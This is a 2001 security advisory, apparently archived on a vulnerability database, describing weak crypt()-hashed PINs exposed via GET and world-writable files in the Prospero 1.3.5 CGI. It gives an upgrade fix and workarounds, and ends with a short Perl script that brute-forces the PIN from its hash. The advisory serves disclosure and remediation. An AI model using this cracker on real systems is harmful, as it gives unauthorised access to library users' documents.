Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:1239
HistoryFeb 02, 2001 - 12:00 a.m.

SUBMISSION - multiple vulnerabilities in Prospero 1.3.5 CGI

2001-02-0200:00:00
vulners.com
193
JSON

= Warped Force Advisory =

Author: darkyoda <[email protected]>
Subject: Multiple vulnerabilities in Prospero 1.3.5 CGI
Discovered: 12.15.00
Announced: 2.1.01
Vendor Status: Maintainer notified 12.27.00. New version released.
Current version is 1.3.7
Platforms: Any web server capable of running CGI scripts; this
includes UNIX and Windows platforms (Apache, IIS, etc.)
Product Homepage : http://bones.med.ohio-state.edu/prospero/

Blurb: "Prospero is a Web-based document delivery system designed as
a complement to the Ariel ® software system. Ariel is a
product of the
Research Libraries Group (RLG) which allows libraries to
use the
Internet to exchange documents through interlibrary loan."

Problem: Client-side Prospero generates a random 3 or 4 digit
PIN that
users enter into a web-based form that grants them access to
documents requested through interlibrary loan. Because the form
uses the GET method, the encrypted PIN is visible in the
browser. A perusal of login.pl reveals that the Perl crypt()
method
is used to encrypt the PIN. It is trivial for an attacker to
determine the PIN by brute-force methods; this would allow
access to
user documents, allowing malicious users to delete them
arbitrarily
or to determine the subject of a user's research.

            In addition, login.pl uses 0666 permissions on log and manifest
            files. The manifest file is the user database containing PINs

and
usernames. Non-prospero users can modify/delete entries in
this file as they please.

Solution: Upgrade to the latest version 1.3.7.
Note that I have not reviewed the source of this latest
version.
Clients who cannot upgrade should change the file permissions
in
login.pl to 0660 and consider using complex alphanumeric PINs
in lieu of the ones generated by Prospero. Note that this will
only slow an attacker, as the hash could still be brute-forced
by an industrial password cracker, ala John the Ripper.

Shouts: Gyves, sysdaemon, 2600 (I forgive you for not publishing my
article), others. Eric Schnell (maintainer) for having
a good attitude.

Exploit:

#!/usr/bin/perl

crack for prospero PINs

dY 12.15.00

printf("Enter encrypted PIN: ");
chop($passwd = <STDIN>);

$salt = substr($passwd,0,2);
$epin = substr($passwd,2,99);

$lowval = 0;
$highval = 9999;

for ($i = $lowval; $i <= $highval; $i++) {
if (crypt($i, $salt) eq $passwd) {
print("***Unencrypted PIN is: $i\n");
exit(0);
}
}
printf("Sorry, couldn't crack it. Try something > $highval.\n");
exit(0);

JSON